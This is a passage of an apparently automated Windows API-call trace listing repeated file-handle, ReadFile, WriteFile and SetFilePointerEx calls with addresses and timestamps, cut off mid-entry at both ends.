lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.072] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.072] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.073] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.073] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.074] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.074] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.075] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.075] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.076] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.076] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.077] GetFileType (hFile=0x50) returned 0x1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, 